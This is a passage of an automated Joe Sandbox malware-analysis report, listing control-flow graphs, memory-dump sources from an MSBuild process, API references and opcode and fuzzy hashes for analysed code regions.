                                                                                                  control_flow_graph 1173 6729159-672918d 1175 672918f-6729192 1173->1175 1176 6729a50-6729a53 1175->1176 1177 6729198-67291ad 1175->1177 1178 6729a55-6729a74 1176->1178 1179 6729a79-6729a7b 1176->1179 1184 67291c5-67291db 1177->1184 1185 67291af-67291b5 1177->1185 1178->1179 1181 6729a82-6729a85 1179->1181 1182 6729a7d 1179->1182 1181->1175 1186 6729a8b-6729a95 1181->1186 1182->1181 1191 67291e6-67291e8 1184->1191 1187 67291b7 1185->1187 1188 67291b9-67291bb 1185->1188 1187->1184 1188->1184 1192 6729200-6729271 1191->1192 1193 67291ea-67291f0 1191->1193 1204 6729273-6729296 1192->1204 1205 672929d-67292b9 1192->1205 1194 67291f2 1193->1194 1195 67291f4-67291f6 1193->1195 1194->1192 1195->1192 1204->1205 1210 67292e5-6729300 1205->1210 1211 67292bb-67292de 1205->1211 1216 6729302-6729324 1210->1216 1217 672932b-6729346 1210->1217 1211->1210 1216->1217 1222 672936b-6729379 1217->1222 1223 6729348-6729364 1217->1223 1224 672937b-6729384 1222->1224 1225 6729389-6729403 1222->1225 1223->1222 1224->1186 1231 6729450-6729465 1225->1231 1232 6729405-6729423 1225->1232 1231->1176 1236 6729425-6729434 1232->1236 1237 672943f-672944e 1232->1237 1236->1237 1237->1231 1237->1232
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q
                                                                                                  • API String ID: 0-355816377
                                                                                                  • Opcode ID: 6ed5390508de74f62bd89455d1dc1805dc11c182afc6371fc1b2c231b58b8c0a
                                                                                                  • Instruction ID: fd1dfded5472f7404f01596a434501e4576341d6af3766b8be0a99e7b43d8a31
                                                                                                  • Opcode Fuzzy Hash: 6ed5390508de74f62bd89455d1dc1805dc11c182afc6371fc1b2c231b58b8c0a
                                                                                                  • Instruction Fuzzy Hash: AC515130B1021A9FDB54DB76D8A0BAEB7F6ABC8644F148579C509DB384EA30DC43CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1277 6724b68-6724b9c 1279 6724b9e-6724ba1 1277->1279 1280 6724bc2-6724bc5 1279->1280 1281 6724ba3-6724bbd 1279->1281 1282 67252a4-67252a6 1280->1282 1283 6724bcb-6724cc3 1280->1283 1281->1280 1285 67252a8 1282->1285 1286 67252ad-67252b0 1282->1286 1301 6724d46-6724d4d 1283->1301 1302 6724cc9-6724d16 call 6725420 1283->1302 1285->1286 1286->1279 1287 67252b6-67252c3 1286->1287 1303 6724d53-6724dc3 1301->1303 1304 6724dd1-6724dda 1301->1304 1315 6724d1c-6724d38 1302->1315 1321 6724dc5 1303->1321 1322 6724dce 1303->1322 1304->1287 1318 6724d43 1315->1318 1319 6724d3a 1315->1319 1318->1301 1319->1318 1321->1322 1322->1304
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: fcq$XPcq
                                                                                                  • API String ID: 0-936005338
                                                                                                  • Opcode ID: 5177a4996fe16286908da4ad58565d660eed12f6c51c296df54eb0d26cd46bbd
                                                                                                  • Instruction ID: bb4b1bdea3b67ecaf70c92b3a5035a2e4c8e0971b482ffc32d7683611f5b3545
                                                                                                  • Opcode Fuzzy Hash: 5177a4996fe16286908da4ad58565d660eed12f6c51c296df54eb0d26cd46bbd
                                                                                                  • Instruction Fuzzy Hash: 96519070F102199FEB559FA9C854BAEBBF7FF88700F208529D106AB395DB718C018B91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 0123EC87
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4073341768.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_1230000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                  • String ID:
                                                                                                  • API String ID: 1890195054-0
                                                                                                  • Opcode ID: a3ec83899882f936f1809ef7642a78ecb12341372020d99d68f7f51dabea1442
                                                                                                  • Instruction ID: 7762bd4be7246474fb561d7f05a51f4c89b290cbbd6e4c5fb77c86966eca1276
                                                                                                  • Opcode Fuzzy Hash: a3ec83899882f936f1809ef7642a78ecb12341372020d99d68f7f51dabea1442
                                                                                                  • Instruction Fuzzy Hash: 9C2154B1C0025ADFCB14DFA9D5447DEFBF4AF48220F11846AD958A7250D338A945CFA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 0123EC87
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4073341768.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_1230000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                  • String ID:
                                                                                                  • API String ID: 1890195054-0
                                                                                                  • Opcode ID: 96d96a415991a897ab1ab405cf1a89d772807a805fc2c9d1411efa07cfa29b5b
                                                                                                  • Instruction ID: e6b0be7d4f2371823c10bd0d5a158cff7ab09b36e3fd566d9f6d777c5d8b9a48
                                                                                                  • Opcode Fuzzy Hash: 96d96a415991a897ab1ab405cf1a89d772807a805fc2c9d1411efa07cfa29b5b
                                                                                                  • Instruction Fuzzy Hash: 6B111FB1C0026A9BCB10CF9AC544BDEFBF4AB48320F15812AE918B7240D379A944CFA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: PH^q
                                                                                                  • API String ID: 0-2549759414
                                                                                                  • Opcode ID: 63a50d29108b1b475126d536ccb06796e05e9c42c846f512398c91b20dc29863
                                                                                                  • Instruction ID: be9024cde217606272875b05258446772c1d8277b289d4ef7c85c6c201017016
                                                                                                  • Opcode Fuzzy Hash: 63a50d29108b1b475126d536ccb06796e05e9c42c846f512398c91b20dc29863
                                                                                                  • Instruction Fuzzy Hash: 4541B130E0071ADFDB65DFA5C4546AEBBB2FF85300F20452AE405EB245DB75E886CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: PH^q
                                                                                                  • API String ID: 0-2549759414
                                                                                                  • Opcode ID: b8dd1e668663ab391ea09bb5417570bc12d84f518f36427a398158d871b047a2
                                                                                                  • Instruction ID: 21d9cc98a3ce5b9eba1bb487d577b5c31bcfe60922696ae2c97036441f85821b
                                                                                                  • Opcode Fuzzy Hash: b8dd1e668663ab391ea09bb5417570bc12d84f518f36427a398158d871b047a2
                                                                                                  • Instruction Fuzzy Hash: F031F430B102129FDB59AB74C45467E7BE3AB89200F144578D416DB386DF36DE46CBA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: PH^q
                                                                                                  • API String ID: 0-2549759414
                                                                                                  • Opcode ID: cbe80b703a486f387c586fc49e9582861737503a92434934a03b6001fa16b932
                                                                                                  • Instruction ID: 4bd46dc8f1d74c63627ea933e2fe843bfe8781c52eaeb95a6d66c3981f8d1e8d
                                                                                                  • Opcode Fuzzy Hash: cbe80b703a486f387c586fc49e9582861737503a92434934a03b6001fa16b932
                                                                                                  • Instruction Fuzzy Hash: DC31F270B102169FDB59AB74C41466E77E3BB89200F208538D016DB386DF36DE46C7A1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: p
                                                                                                  • API String ID: 0-2181537457
                                                                                                  • Opcode ID: a6fbf61e5c250a310f5179a2c7bd7d4c634a8219ca4d107e6bb399c6678e97db
                                                                                                  • Instruction ID: 194385784f06ab9637b1c876a6e1040b2d79328ed8748aff7eed930673167b40
                                                                                                  • Opcode Fuzzy Hash: a6fbf61e5c250a310f5179a2c7bd7d4c634a8219ca4d107e6bb399c6678e97db
                                                                                                  • Instruction Fuzzy Hash: C501D831F4525A8FCB40EBBCE44029EBBB1FB42210F104276D51ED7259D7359541CB92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 513c62133c6da0640b10e79f2334bf1691eee350833fd8cc95b91bf9de58c808
                                                                                                  • Instruction ID: 544cf09ef1a619e72f19e264ddbeb2b7c9b134c6343e39682ce2356c3d92ee0d
                                                                                                  • Opcode Fuzzy Hash: 513c62133c6da0640b10e79f2334bf1691eee350833fd8cc95b91bf9de58c808
                                                                                                  • Instruction Fuzzy Hash: 3D32A170B1022A8FDB95DB69D890BAEB7B2FB88314F108535D505EB355DB31EC82CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8f67d932f08b1ae4adb7f5cb63fc773462b95e2b402c3681192107e6c69bd1f2
                                                                                                  • Instruction ID: b51c5afcc24fe3b608d67de44750ae789253ca4dd51389c532d2bf083dffed63
                                                                                                  • Opcode Fuzzy Hash: 8f67d932f08b1ae4adb7f5cb63fc773462b95e2b402c3681192107e6c69bd1f2
                                                                                                  • Instruction Fuzzy Hash: 5261B1B1F000224FCF549A7EC89466FBAD7AFD4624B25443AD80EDB364DE65DD0287D2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bc51a27311eb15be265e6bfda9fc19dec4d3c303e9c424233055126c7e70ac52
                                                                                                  • Instruction ID: 1f9348c75f192f9dff8f79289ec1a65cdaf2819fbf65b2fe5b623c5d2876f32e
                                                                                                  • Opcode Fuzzy Hash: bc51a27311eb15be265e6bfda9fc19dec4d3c303e9c424233055126c7e70ac52
                                                                                                  • Instruction Fuzzy Hash: A1815D30B1021A9FDF54DFA9C5546AEB7F2BF88304F108529D40AEB399EB34DC828B51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7225b792be634fdfbc182ab6e6bcf1eccaa2e9908cae4cc58cd4a5babadf0f08
                                                                                                  • Instruction ID: 8b4c5fb411c7c78c790e57c3d383a79861998a47e749911d09d50713b5721637
                                                                                                  • Opcode Fuzzy Hash: 7225b792be634fdfbc182ab6e6bcf1eccaa2e9908cae4cc58cd4a5babadf0f08
                                                                                                  • Instruction Fuzzy Hash: 5B915F30E1021A8FDF60DF68C880B9DB7B1FF89300F208595D559AB355EB70AA85CF91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4399822988dfe08a5d2b0d8c2ee92388d4acd855f408c023f8203cdb113afc99
                                                                                                  • Instruction ID: 1ea998a0740b596df68deb3df5561ea90b77105f7e8f1e2be7fdf213b46818a7
                                                                                                  • Opcode Fuzzy Hash: 4399822988dfe08a5d2b0d8c2ee92388d4acd855f408c023f8203cdb113afc99
                                                                                                  • Instruction Fuzzy Hash: 3A914E30E1021A8BDF64DF68C880B9DB7B1FF89300F208599D559BB355EB70AA85CF91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c84a521c42b7876e26632fb81e6ce727744a93867155c77fcc4ad73e9a190837
                                                                                                  • Instruction ID: a714082bd078212179024b59cddf16bf4cf7a0ffa88798b3b343c3a398995396
                                                                                                  • Opcode Fuzzy Hash: c84a521c42b7876e26632fb81e6ce727744a93867155c77fcc4ad73e9a190837
                                                                                                  • Instruction Fuzzy Hash: F6714C70E1021A9FDB54DFA9D980AAEBBF6FF88304F148529D009EB355DB34E846CB51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a85bd814c38265e5d1a70a626fb54e2f68cfcf1f0056ca85775053ebebe6122b
                                                                                                  • Instruction ID: a5c2c326f78700aa4c022dfef5804e2a39c308c20ad723fbe35cd60f6899cc88
                                                                                                  • Opcode Fuzzy Hash: a85bd814c38265e5d1a70a626fb54e2f68cfcf1f0056ca85775053ebebe6122b
                                                                                                  • Instruction Fuzzy Hash: BE712970E1021A9FDB54DBA9D980AAEBBF6FF88304F148529E005EB355DB34EC46CB51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8d92b5eeb92ff90089fdff98bcd3d07c19904b9bc175ddaefb93865093864d21
                                                                                                  • Instruction ID: 39ed4f8eb39e6a8762ffa047801e78acff365774f6c32374e7daa23db074deff
                                                                                                  • Opcode Fuzzy Hash: 8d92b5eeb92ff90089fdff98bcd3d07c19904b9bc175ddaefb93865093864d21
                                                                                                  • Instruction Fuzzy Hash: A251E231E00216DFDF64AFB8E4546AEBBB2FF84315F20883AE116D7255DB398845CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f52edf03b9b56315770948f57e9e77fc49f689daafb24acc862991ed633ca635
                                                                                                  • Instruction ID: 7cb380bf1165030827bd661201ca983ce6f4cd3aad7f78642565359183ecd01e
                                                                                                  • Opcode Fuzzy Hash: f52edf03b9b56315770948f57e9e77fc49f689daafb24acc862991ed633ca635
                                                                                                  • Instruction Fuzzy Hash: 60511830B50225DFEF64567CD99473F266ED789340F20492AE40AD73A9CA3DCC8543A2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 25abf23b57662dbca61beff725830260e6d01d9ba6787f0b707759af270ef7d2
                                                                                                  • Instruction ID: 44b1e6e626702e17bcc04597fad1782175bfad630ae46f164f6bb57f2029f1e3
                                                                                                  • Opcode Fuzzy Hash: 25abf23b57662dbca61beff725830260e6d01d9ba6787f0b707759af270ef7d2
                                                                                                  • Instruction Fuzzy Hash: 43511830B50229DFEF64567CD99473F266FD789740F20492AE40AD73A9CA3DCC8543A2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f95f86899a34c3143b0ec030fd589fb8af4c186e370409a8a7f9f08430d2fac8
                                                                                                  • Instruction ID: a1e1db3f34a1c4961f54c29e66682e26606cbdfd4b563db1d415a65ae14730db
                                                                                                  • Opcode Fuzzy Hash: f95f86899a34c3143b0ec030fd589fb8af4c186e370409a8a7f9f08430d2fac8
                                                                                                  • Instruction Fuzzy Hash: 11412E71E006168FDB70CF9AD880ABFFBB2FB84310F10492AD156D7655D330E9958B91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 86f7f700d5ee3b88457b465a444cb5653a9b14b57c2c8669c3a18523ed418f82
                                                                                                  • Instruction ID: 4f5fca7f68d6165251cf7fb5399d9632025a6806ca8daff76a42d7850a532db5
                                                                                                  • Opcode Fuzzy Hash: 86f7f700d5ee3b88457b465a444cb5653a9b14b57c2c8669c3a18523ed418f82
                                                                                                  • Instruction Fuzzy Hash: B331C330E102169FCB55CF64D854AAEB7B6EF89300F108519E816EB351DB71ED86CB51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 25495e6a107fb7fb66cd2c24445ab73299bbacc83e501ce0fe63e415ac84565e
                                                                                                  • Instruction ID: f06e7f67e936964ecbb167570d27fbcfcebd61638145145a4c12c2e8792d433c
                                                                                                  • Opcode Fuzzy Hash: 25495e6a107fb7fb66cd2c24445ab73299bbacc83e501ce0fe63e415ac84565e
                                                                                                  • Instruction Fuzzy Hash: 52319331A1022A8FCF25DF69C98069EF7B6FF85304F10492AE805AB254DB70E9468B90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b448a3c4d13529c313be70ff97cd65cb702d2cbaf3e23bef732265c50e08eb50
                                                                                                  • Instruction ID: 431ba731110d7f03b0d658be55d9eafa04f1af6a150453bafcd7c07ae9267c56
                                                                                                  • Opcode Fuzzy Hash: b448a3c4d13529c313be70ff97cd65cb702d2cbaf3e23bef732265c50e08eb50
                                                                                                  • Instruction Fuzzy Hash: 4631A030E102169FCB58CFA4D864AAEB7B6FF89300F108529E916E7351DB71ED82CB50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f5478f59069f02c07f291ee08dabada0bfdbfc552d2ce6309fea3d2371ba8a5a
                                                                                                  • Instruction ID: 5c7d84c3673b907bca5144ca80a7d183f2e2ffc31bf56a7f75bce8e69f572b0b
                                                                                                  • Opcode Fuzzy Hash: f5478f59069f02c07f291ee08dabada0bfdbfc552d2ce6309fea3d2371ba8a5a
                                                                                                  • Instruction Fuzzy Hash: BB216D75F1022A9FDB50DF69E880EAEB7F5EB48650F108135E905E7390EB34D941CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 17628c2cc4bab557fd089f244fdf8c8b8e05db302d0132022e08b277ff501ffd
                                                                                                  • Instruction ID: 27485386a581c149ce7a1eb1f31144e9d317152838710354dffc2118700d484f
                                                                                                  • Opcode Fuzzy Hash: 17628c2cc4bab557fd089f244fdf8c8b8e05db302d0132022e08b277ff501ffd
                                                                                                  • Instruction Fuzzy Hash: F1217C75F1062A9FDB40DF69D980AAEB7F1EB48610F108139E905E7340EB34DD01CB95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4073077863.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_11ed000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f75e0f9f83db221c917d0a77dc838b545fb3a2f5cdb21e460a9e80fbe13d17b0
                                                                                                  • Instruction ID: eb2d5b942693a02fd1dd51f78c88dcd38458fcb6f904574b8c3d11b6e17d0ab4
                                                                                                  • Opcode Fuzzy Hash: f75e0f9f83db221c917d0a77dc838b545fb3a2f5cdb21e460a9e80fbe13d17b0
                                                                                                  • Instruction Fuzzy Hash: 07212571504600DFCF19DF98E988B26BFA5EB84314F28C56DD80A4B296C336D446CA62
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4073077863.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_11ed000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1b3d38e35ca1d03159603773a749e100c6334327aa034827fc7aafc63e33f397
                                                                                                  • Instruction ID: 93373f0be0a701855789082837f9e92ed53216b04654b177eac51d0bcbe8885a
                                                                                                  • Opcode Fuzzy Hash: 1b3d38e35ca1d03159603773a749e100c6334327aa034827fc7aafc63e33f397
                                                                                                  • Instruction Fuzzy Hash: D6218D315093C08FCB07CF64D894715BF71AB46214F28C1EBD8898F2A3C33A980ACB62
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 15be8a09d73b4f71b103c944bea4d478838c8f327a41e870e6a0021bb1f1c86d
                                                                                                  • Instruction ID: af2e41614bd623f91b6ac3fdf2e5b339bb7fdff7448cc9ea317b6405432df0d4
                                                                                                  • Opcode Fuzzy Hash: 15be8a09d73b4f71b103c944bea4d478838c8f327a41e870e6a0021bb1f1c86d
                                                                                                  • Instruction Fuzzy Hash: DE11A532B141395FDF549A79C814AAE73EBABC8721F00823AD80AE7344DE39DC028791
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d71472366dc89959497969f51214dea7182ff65343e103355308c07bd4e2fee0
                                                                                                  • Instruction ID: 6a4a34503f2e7eef5c40806abf3f93922584155676c1d8dbb3618a23c32fa66d
                                                                                                  • Opcode Fuzzy Hash: d71472366dc89959497969f51214dea7182ff65343e103355308c07bd4e2fee0
                                                                                                  • Instruction Fuzzy Hash: 0B01B171B041211FEB65C6BED81476FA7DBDBCA710F24842AE50ACB399DA61CC0243A1
                                                                                                  Uniqueness

